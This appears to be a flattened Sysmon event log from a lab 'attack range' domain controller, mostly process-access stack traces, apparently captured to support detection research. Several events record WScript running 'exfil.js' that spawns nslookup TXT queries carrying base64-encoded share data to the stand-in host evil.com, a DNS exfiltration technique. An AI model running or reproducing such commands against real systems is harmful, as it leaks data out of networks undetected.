10341000x8000000000000000196800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-E83E-000000005F02}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B2-629A-E83E-000000005F02}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.037{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgnag.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 154100x8000000000000000196795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.029{2E1864BB-17B2-629A-E83E-000000005F02}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043921Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:18.464{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9924282B14D4306567131B7FD4EE2C0C,SHA256=E6DEF88E0F211AD6AF887FEDABAFF941550FF9C2BD2D2427396CEA0C8E6D3DBB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1E3F-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-17A1-629A-783D-000000005F02}55525944C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-1E3F-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.977{2E1864BB-17B3-629A-1E3F-000000005F02}376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.973{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxuvs.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-17B3-629A-1C3F-000000005F02}28004796C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-1D3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1D3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.889{2E1864BB-17B3-629A-1B3F-000000005F02}38723552C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-1D3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.890{2E1864BB-17B3-629A-1D3F-000000005F02}1496C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-1B3F-000000005F02}3872C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxuvs.tmp 2>&1 10341000x8000000000000000197232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.858{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-1C3F-000000005F02}2800C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.858{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-1C3F-000000005F02}2800C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.858{2E1864BB-17B3-629A-1C3F-000000005F02}28004796C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-1B3F-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.826{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-1C3F-000000005F02}2800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.811{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 